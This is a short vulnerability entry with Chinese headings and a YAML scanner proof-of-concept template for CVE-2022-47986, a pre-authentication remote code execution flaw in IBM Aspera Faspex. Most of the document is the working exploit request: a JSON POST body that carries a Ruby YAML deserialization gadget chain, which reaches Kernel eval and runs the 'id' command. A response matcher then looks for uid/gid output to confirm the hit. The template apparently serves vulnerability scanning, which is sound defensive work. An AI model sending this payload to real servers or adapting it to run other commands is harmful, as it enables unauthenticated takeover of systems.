漏洞描述
app="Aspera-Faspex"
CVE-2022-47986: Aspera Faspex Pre Auth RCE
PoC代码[已公开]
id: CVE-2022-47986
info:
name: Aspera Faspex Pre Auth RCE
author: zan8in
severity: critical
verified: true
description: |
app="Aspera-Faspex"
set:
randstr: randomLowercase(12)
randstr4: randomLowercase(4)
randstr8: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /aspera/faspex/package_relay/relay_package
headers:
Content-Type: application/json
body: |
{"package_file_list": ["/"], "external_emails": "\n---\n- !ruby/object:Gem::Installer\n i: x\n- !ruby/object:Gem::SpecFetcher\n i: y\n- !ruby/object:Gem::Requirement\n requirements:\n !ruby/object:Gem::Package::TarReader\n io: &1 !ruby/object:Net::BufferedIO\n io: &1 !ruby/object:Gem::Package::TarReader::Entry\n read: 0\n header: \"pew\"\n debug_output: &1 !ruby/object:Net::WriteAdapter\n socket: &1 !ruby/object:PrettyPrint\n output: !ruby/object:Net::WriteAdapter\n socket: &1 !ruby/module \"Kernel\"\n method_id: :eval\n newline: \"throw `id`\"\n buffer: {}\n group_stack:\n - !ruby/object:PrettyPrint::Group\n break: true\n method_id: :breakable\n", "package_name": "{{randstr4}}", "package_note": "{{randstr}}", "original_sender_name": "{{randstr}}", "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "metadata_human_readable": "Yes", "forward": "pew", "metadata_json": "{}", "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "delivery_sender_name": "{{randstr8}}", "delivery_title": "{{randstr4}}", "delivery_note": "{{randstr4}}", "delete_after_download": true, "delete_after_download_condition": "IDK"}
expression: 'response.status == 500 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)'
expression: r0()